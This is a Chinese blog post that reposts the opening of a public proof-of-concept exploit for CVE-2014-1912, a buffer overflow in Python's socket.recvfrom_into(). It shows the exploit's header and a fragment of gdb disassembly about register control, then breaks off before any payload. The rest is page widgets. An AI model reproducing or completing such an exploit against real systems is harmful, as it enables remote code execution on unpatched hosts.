python open 函数漏洞_Python socket.recvfrom_info()函数中的远程代码执行漏洞

最近,pastebin上发布了一个exploit,是关于Python 2.7和3.x版本中的socket.recvfrom_into()函数中一个远程代码执行漏洞(栈溢出)的PoC。

(有些地方pastebin.com可能被墙了,为了方便,译者把它拷贝到文章里。)原exploit如下:#!/usr/bin/env python'''

# Exploit Title: python socket.recvfrom_into() remote buffer overflow

# Date: 21/02/2014

# Exploit Author: @sha0coder

# Vendor Homepage: python.org

# Version: python2.7 and python3

# Tested on: linux 32bit + python2.7

# CVE : CVE-2014-1912

socket.recvfrom_into() remote buffer overflow Proof of concept

by @sha0coder

With NX evasion!

(gdb) x/i $eip

=> 0x817bb28:mov    eax,DWORD PTR [ebx+0x4]        eax full conrol

0x817bb2b:test   BYTE PTR [eax+0x55],0x40

0x817bb2f:jne    0x817bb38 -->

...

0x817bb38:mov    eax,DWORD PTR [eax+0xa4]      

0x817bb3e:tes

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值